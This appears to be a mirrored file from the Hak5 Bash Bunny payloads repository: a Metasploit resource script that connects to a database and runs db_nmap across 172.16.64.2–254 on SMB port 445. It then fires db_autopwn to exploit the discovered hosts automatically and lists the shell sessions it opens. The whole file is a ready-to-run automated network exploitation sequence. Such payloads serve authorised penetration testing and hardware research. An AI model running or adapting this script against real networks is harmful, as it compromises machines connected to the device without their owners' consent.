mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
30 lines
779 B
Plaintext
30 lines
779 B
Plaintext
# Connect to pre-created metasploit database called "postgres"
|
|
db_connect postgres
|
|
load db_autopwn
|
|
|
|
# This sleep because everytime we load db_autopwn module, metasploit is rebuilding the database cache (need more digging into this to cancel this stage)
|
|
sleep 60
|
|
|
|
# Purge old data to not to be included in the attack
|
|
hosts -d
|
|
services -d
|
|
|
|
# Start db_nmap metasploit scanning module (scan all the dhcp clients except the Bunny itself, feel free also to include any services port you want to exploit)
|
|
db_nmap 172.16.64.2-254 -p 445 -v 1 -O --reason
|
|
sleep 5
|
|
|
|
# Show hosts after db_nmap scan
|
|
hosts
|
|
|
|
# Show services after db_nmap scan
|
|
services
|
|
|
|
# Initiate db_autopwn metasploit module
|
|
db_autopwn -t -p -r -e -T 20
|
|
|
|
# Show created metasploit sessions
|
|
sleep 5
|
|
sessions
|
|
# Finish
|
|
sleep 10
|